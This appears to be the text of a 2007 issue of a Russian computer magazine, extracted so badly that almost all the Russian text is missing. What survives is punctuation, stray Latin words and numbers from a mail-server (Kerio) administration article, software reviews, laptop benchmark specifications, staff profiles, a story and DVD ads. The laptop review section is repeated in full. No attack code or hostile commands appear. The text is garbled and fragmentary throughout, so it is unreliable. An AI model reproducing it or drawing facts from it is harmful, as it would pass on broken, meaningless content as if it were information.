, ( ), .
{} !
{} .
{} -
?
{} ! !
{} .
{} #%@&**!
{} ( ).
{} !
{} ,
{} .
{} %@#%*!!
{} ( ): .
{} , $%@@ %&#!!
{}
... .
, , , . ;).

soft
admining
!


( S A N P R I H @ M A I L . R U )


, ,
.
,
,
. :
IP-
. ,
: /, ,
,
. ,
xakdomain.org, . DNS-
MX,
. , DNS-
,

. , ,
, .
, ,
.

.
:
,
!
,
, .
, .
. ,

Kerio.
. , 30
700
. ,
www.kerio.com. .
,
. (
). . ,
6.3 . . . .
.
, . .
. . , , . ,
.

.
.


.
,
. ,
.

,
,

.

, , .
- , ,
. .
Kerio,
,
.

. . .
.
. , , ,

. IMAP. : IMAP (Internet
Message Access Protocol) -
.
IMAP

, .
,
,

, .

()
.
,
IMAP. :
NNTP ,

news-
.
.
News-

, -

! IP-!
,
Spam&Virus.

. ! ,
( 61.216.119.248),
SPAM.
!
.

IP- IP-

IP- Spam&Virus. .

.

IP-
, ,

Span&Virus. , .
- ,
. , ,
, . : -,
,
www.whoisinform.ru,
IP-,
.
,
,
.

61.216.0.0 61.219.255.255.

. IP-

.
. SMTP 25 .,

LAN.
.
:
SMTP-,
- . - 30
.
,
-
. ,
, .
, -

, .

95 |

. NNTP -mail .
.

. ,
NNTP
- , ( ). NNTP TCP 119. NNTP SSL (.. NNTPS) 563.
.
NNTP
NNTP.
. LDAP.

Active Directory,
.
:

IP- . !
IP-! ,
Lan,
,
.

IP-, .
SMTP.
! SMTP.

IP-
IP-
LAN. ,
,
.
. . , IP-
LAN.
.
, , .
SMTP

.
,
. . !
.
. .
-

, ! .

,

. , .
, ,
. .




. , , .
, ,
,
,

.


.
!

! .
,
,


. , ,

,

.
,
.

soft

Console 2.00.127
sourceforge.net/projects/console
Freeware
-, ( Windows
) . .
, ,
cmd. ( ),
. sourceforge.net. Windows! , (cmd, bash, etc) . ( ), ( , , ), (
). portable software.

Audacity 1.2.6
audacity.sourceforge.net
Freeware
sourceforge.net
. Audacity ,
, (,
), (wav, mp3,
ogg): , , ,
. Audacity
( VST-),
,
. Audacity , Windows,
Mac OS X, GNU/Linux Unix.

1.3.2.

Advanced Vista
Codec Package 4.2.0
msfn.org
Freeware
Windows Vista , ,
, . , . ,
Windows XP, .
: . : ,
. .

NoClone Enterprise
Edition 4
noclone.net
Shareware
, , .
NoClone : (, CRC) ,
,
.
,
,



. , .

Windows Vista,

Microsoft. WinXP Manager . Vista Manager
, 20 ,
. , .

. ,
. Vista Manager Windows Vista .NET Framework, .

Portable AnyReader 1.9.55


anyreader.com/ru/
Shareware

Opera 9.10 Final


opera.com
Freeware

: CD/DVD-, Flash, HDD, ZIP, LAN, Wireless


LAN, Bluetooth. , , . AnyReader
,
. , . , ,
. , .

, , . Opera
.
,

, . Opera 9
. : p2p-, BitTorrent, , irc-,
rss-, ( , Windows Vista).
Fraud Protection.

Lazy Setup
CD 1.5 Pro
autosetup.org.ru
Shareware

,


?
, ,
. Lazy Setup CD , , Lazy Setup .
, Next
Yes, , , I Agree :). , //, , ..
. ,
75% .
, . .

97 |

Vista Manager 1.0.3


winxp-m
manager.com/vistamanager
Shareware

Easy CD-DA
Extractor 10.0.3
poikosoft.com
Shareware

-.
audioCD
(mp3, wma,
ogg, mp4, m4a, aac, FLAC, Musepack, vqf, wav, aiff Monkey's
Audio) ,
BURNProof. audioCD
,

. ID3, ID3V2-. ,
UNICODE, , . 30
, .

Mudbox 1.0 Final


mudbox3d.com
Shareware
,
3D- .
, , , . 3D-
. Mudbox
, . 3D-
Photoshop: , , .
.
.

hard


.
, . , , , .
.
PCMark 2005, ,
. ,
! ( , , ..) , .
, ,
.

. , , .
: .
Lavalys Everest . , . , S&M
( ) ThrottleWatch ( , ),
Always On ( ) Laptop (
). ,
, Laptop
,
, , . , : 3DMark 2001 SE, 3DMark 2003, 3DMark 2003,
PCMark 2004 PCMark 2005. Battery Eater,
. OptiCAL
.

ACER TRAVELMATE
4222 WLMI
($1100) 6

, : 1.66, Intel Core Duo T2300E


, : 1024
, : 15.4
, : Intel GMA 950
, : 80
: DVD+RW Super Multi
Fi
- : , LAN, Bluetooth, Wi-F
Card, VGA
: USB, mic, ear, PC-C
, : 364x274.75x30
, : 2.95

.
Acer, , ,
,
, ,
. 15.4" , ,
, , -

. web-. ,
. -
- . ,

(, LAN, Bluetooth,
Wi-Fi). -.
. , ,
,

.
- 3DMark 2005 2006,
, , .

($1199) 6

, : 1.8, AMD Sempron


, : 1024
, : 14
, : 256, NVIDIA GeForce Go 6100
, : 60
ROM
: DVD-R
- : , LAN
Card, VGA
: USB, mic, ear, PC-C
, : 330x275x26
, : 2.1

. , MSI ,
. ,
-

ROVERBOOK
NAUTILUS W550 WH
($1250) 9

60
, : 2.0, AMD Turion 64 X2 TL-6
, : 1024
, : 15.4
, : 5256, NVIDIA GeForce Go 7600
, : 100
: DVD+RW DL
Fi
- : , LAN, Bluetooth, Wi-F
Card,
: USB, mic, ear, PC-C
S-V
Video, DVI, mini FireWire
, : 35825930
, : 2.9

. Rover
675- MSI: ,
, NumPad'.
web-,
.
Rover : AMD Turion 64 X2 TL-60
( TL-56 675) (100
80 ). NVIDIA GeForce
7600 Go

MSI .
:
( ),
, ,

.
!
. , .
- ,
.

Power.

. , ,

. ,
, ,
Power,
. Wi-Fi
,
.
. ,
.
PCMark 2005
.
,
, ,

,
.

101 |

MSI MEGABOOK
S430

hard


.
, . , , , .
.
PCMark 2005, ,
. ,
! ( , , ..) , .
, ,
.

. , , .
: .
Lavalys Everest . , . , S&M
( ) ThrottleWatch ( , ),
Always On ( ) Laptop (
). ,
, Laptop
,
, , . , : 3DMark 2001 SE, 3DMark 2003, 3DMark 2003,
PCMark 2004 PCMark 2005. Battery Eater,
. OptiCAL
.

ACER TRAVELMATE
4222 WLMI
($1100) 6

, : 1.66, Intel Core Duo T2300E


, : 1024
, : 15.4
, : Intel GMA 950
, : 80
: DVD+RW Super Multi
Fi
- : , LAN, Bluetooth, Wi-F
Card, VGA
: USB, mic, ear, PC-C
, : 364x274.75x30
, : 2.95

.
Acer, , ,
,
, ,
. 15.4" , ,
, , -

. web-. ,
. -
- . ,

(, LAN, Bluetooth,
Wi-Fi). -.
. , ,
,

.
- 3DMark 2005 2006,
, , .

($1199) 6

, : 1.8, AMD Sempron


, : 1024
, : 14
, : 256, NVIDIA GeForce Go 6100
, : 60
ROM
: DVD-R
- : , LAN
Card, VGA
: USB, mic, ear, PC-C
, : 330x275x26
, : 2.1

. , MSI ,
. ,
-

ROVERBOOK
NAUTILUS W550 WH
($1250) 9

60
, : 2.0, AMD Turion 64 X2 TL-6
, : 1024
, : 15.4
, : 5256, NVIDIA GeForce Go 7600
, : 100
: DVD+RW DL
Fi
- : , LAN, Bluetooth, Wi-F
Card,
: USB, mic, ear, PC-C
S-V
Video, DVI, mini FireWire
, : 35825930
, : 2.9

. Rover
675- MSI: ,
, NumPad'.
web-,
.
Rover : AMD Turion 64 X2 TL-60
( TL-56 675) (100
80 ). NVIDIA GeForce
7600 Go

MSI .
:
( ),
, ,

.
!
. , .
- ,
.

Power.

. , ,

. ,
, ,
Power,
. Wi-Fi
,
.
. ,
.
PCMark 2005
.
,
, ,

,
.

101 |

MSI MEGABOOK
S430

crew


!

.
.

,
.
:), ,

.
-
IT ,
IT-
,

:).

(,
,
),
, ,
B2B
,
,
.
.

,

.

7
1

1

aka Dr.Klouniz




( )


' :).

2001 , , (


:)).
,
,
xakep.ru
,

Delphi :).

,
-



( ,
2003-, ,
,
).

(

,
:)),

(forums.rusmedserv.com). , , , ,
, power metal.


2006 ,

,
.

,

,
, -


:-)
( :) . Dr.).

, ;
,
. : (
! .
Dr.), .


,
!


!
, ,

, , .
,
!


=).
2006,

.
,

,
. ,
:
!


2003
,


,

,
.

- , -

103 |



.
, , .
.
. ,
Force Team
(www.forceteam.ru).

8
&

-

6

aka AvaLANche

2003 .
, ,



.

,
: ,
,

, ,


,
(,
?
,
:) . ).


, ,
. , ,

.


,
,


. ,

-.
,
,
, ( )
!

,
. 15
15
,
. , ,
. -

, - . , .

,
.
,

,
, ...



,
!

story


.
N I R O ( N I R O @ R E A L . X A K E P . R U ,
W W W . N I R O - D E - R O B E R T . L I V E J O U R N A L . C O M )


, ,
.
, ,

.
, , .
?
( )
:
. . , -.

, , . .


, -, , , .
,
! . !
! !
, -
:
. ?
. -
:

, ! .
, , , . ?
, -, .
.
?

, .
,
? , , .
, . .

, ,
. ?
.
.
.
- ?
. .
.
, ,
, .
. !
. . , .
,
:
?
:

,
. .
? .
. .
, ,
.
*****
.
, , - , , , ,
, - , , , , .
, , , . ? , ? ,
, , , ?
, ,
:
. .
. ,
. , . ICQ 444115686. -

105 |
, . . .
. ,
- ,
.
-, .
? , ? ? : , , .
, . ,
. .
, -
.
,
, .
. ,
, , .
, -

. ,
-
, ,
. ,
. ,
,
.
. , , ,
- .
, , , ,
,
. .
.
, . . . . , , . .
, , , . , ,
, . -

106 |

. , , , , .
- . , , , . . . , , .
; . , , .


-.

, , ,
, , , .
, .
. ,
, . , , , , .
. ,
, ,
, ,
, , . ,
, , .
, . ,
,
. ,
.
? , ,
.
-
, ,
, , . ,
, ,
, , , .
?.. , .
,
, , , ,
. , .
, .
. ?
.
, . - ,
*****
, ,
:
. . . , . ICQ 444115686 .
.
, , .
, , , , ,

, .
, , , - , -

. ,
, ,
,
. . .
-
. , , ,
, . - ,
, , -
. ,
, ,
.
, ,
. , - .
, , , ,
- ,
.
, , . , ,
.
, .
. ,
( ). , :
. , ,
. .
. .

. , ,
. , , ,
.
,
, , , , . , -
, , , , , ,
.
. .
. , , . , , . ,
, ,
.
.
? ,
. -
, ,
, . . - .
, . - , , . ,
,
, , . , .
, , ,
, .

*****
.
, , ,
, .
, , , ,
, , , ,
. -
,
. ,
, .
, , . , ,
. , - ,
, , , - .
- ,
. - ,
, , , .
,
, ,
. , . - .
? .
, :
, -?
, , ,
, . ? ,
.
:
. .
. , -

.




!

,
. , . .

, :
.
, ?

. - c.
?
. .
.
, . . ?
- ?
, ,
. -
, , . ,
,
- .
. . . . , . .
? .
?
:
. . . , , - .
. , .
,
. , ,
. , ,
, , .
, , , ,
?
? .
. .
. , ,
. , ,
, . , - ? ? -? ?
, -, . , . - , , , ?
? .
? , . ,
, . , . , ?
. ,

, ? .

, -
, , .
. .
, . -
, , .
.
. - . .

, , ,
?

107 |

: - . , ,
.
,
, . ,
.
,
,
.
, , , ; .
;
, . . .
,
. ; , . , , , , .
. ,
. , , .
, , .

,
.

108 |

, .
, .

. . .
, -.

*****
? , . , ,
?
?
, , - . . , - .
, ?
. . .
,
.
, ,
, -, - ,
, .
, ,
:
, -? ,
.
:
?
:
.
? , , . ? , ?
, . ,
, .
, -
, ,
. ,
. , , .
, .
, . - .
, , , . ,
.
. . , , , ,
.
.
. . .

, . , .
. ,
,
,
.
, -
.
,
, ,

, . , . .
, ,
- ,

*****
,
. ,
. -, ,
. , .
,
, ,
.
, , , , , . - ,
, .
- , , , .
,
, - ,
,
, . , ,
.
, , ,
, . - , , .
, ,
, , . ,
,
? ! ? ! , ? ? ? ? ? ! ? .
? . -? . ,

. .
, , , , , ,
. ,
.
.
, , , , ,
, .
- , . , , . , , - , - ,
, ? , - ,

, . ,
, ; ,
, , ,
.

, , -

. . . , . . .
. ,

, , .
, ,
, ,
.
, , ,

, , , , ?
? ,
!
. , , . , ,
, ,

, . , .
. . . .

. , , , .
, ,
, .
. .

, , .

, .
, , , ,
.
, . , ?..
*****
? , , . , -
, .
, !..
. , . ,
, .
.
,
. .

109 |

,
, .
, , , , , ,
. , ,

, , .
.
- , ,
. . - , , , , , .
.
- ,

.

, , , .
, ,
,
,
.
, - .
, .
, , ,
, .
.
, . .
, , ,
.
, , , -
- , ,
.
, - , . . - . , , . , , , . -
, , . :
, , . . , , . , ,
. .
, , -, . ;
:
, . .
.
.
-? , , .
.
, , . . -

? .

, . -

, , .
.
? - ?

110 |

, , .
? ? ?
! . 444115686, - , .

, .
. , ? ? ?
, :
.
:
.
. . .
.
. .
?..
? -, , . , !
, , . ,
.
.
. . , , .
. ,
. ,
, . ? ?
, .
, , .

- ?
. , . . . ?
, - , .
-
. .
, , ,
:
- ?
, :
, - ?
, ,
. - ,

.
, :
, . .
. , , ,
.

, .
, , ;
, . ,
, .
, .

. ,
. , ,
, .

, , .
, -
.
, , , ,
. .
.
,
:
! , ! !
:
. ,
?
.
, ?
:
, , . , , ?
. , .

, , .
. ,
, . ?
, .
? ? .
-, . .
. . , .
, ,
.
- , , .
. , .
. , . ,
.
, .
? ,
, , .
. ,

. , ,

.
.
- , , , , .
. .
.
,
,
. ,
, .

, , . .
?
, , - . . - ,
. - . , ,
. , .

*****
. , .
- ,
.

, -, . , ,
. .
, ,
. .
,
, .

. ,
,
.
, . ,
, . .
,
. ,
,
.

, . , .
?
, .
, , .

. , , . ,
,
. , ,
, , .
?
,
.
. .
, . .
.

,
.

.
.
?
, .
. ,

? ? .
.
?
, .
, .
, .
. .
. .

111 |

.
.
.
.
, , - .
, . ,
. , -
, .
? .
? . ,
,
? .
?
? .
, .
. ? ! ?
. , , ...
:
, ?
. , ,
, .
. .
?
.
, ,
.
, , . , ,
:
-
.
.

IV

112 |

,
4- . ,
.
, , ,
. ,
, (


),
.
.
( ).
3 , 39%
,
,
. , ! , ! - . , ,
,
. . ,
. ,
,
.
,
. . ,
, ,

: . ,
.
!!!
, , .
, (
), ,
.
,
, : ,
. . . ,
,
,
. ,

, ' ,
,
, ,
,
. , , , . ,

, ,
- .
,
. : , . . .
. .
, , - ,
. ,
.
:
.
,

, ,

.
(
!)
penumr', EPOX'. !
!

- P-III!
,
,
. ,
, 700VA . 2200VA.
. , , ,
,
:

. , SMS'
SMS',
. , .
- !
(
,
). ,
- ,
,
700VA,
2200VA,
. . . .
, .
SYS',
.
. , .
. XviD' ,

. ,

',

, ?
TOTAL DVD!
,
,

DVD , 50 ,

... !
, !

Total DVD !
DVD-
(
),
DVD-.

?
DVD - !
Hi-Fi, High End Home Cinema!



. 50

, ,
!

DVD !
, , , !
DVD-
(
) .

*3,.3*
XYFWY

R

F]NYZSN






SL



02|775|2007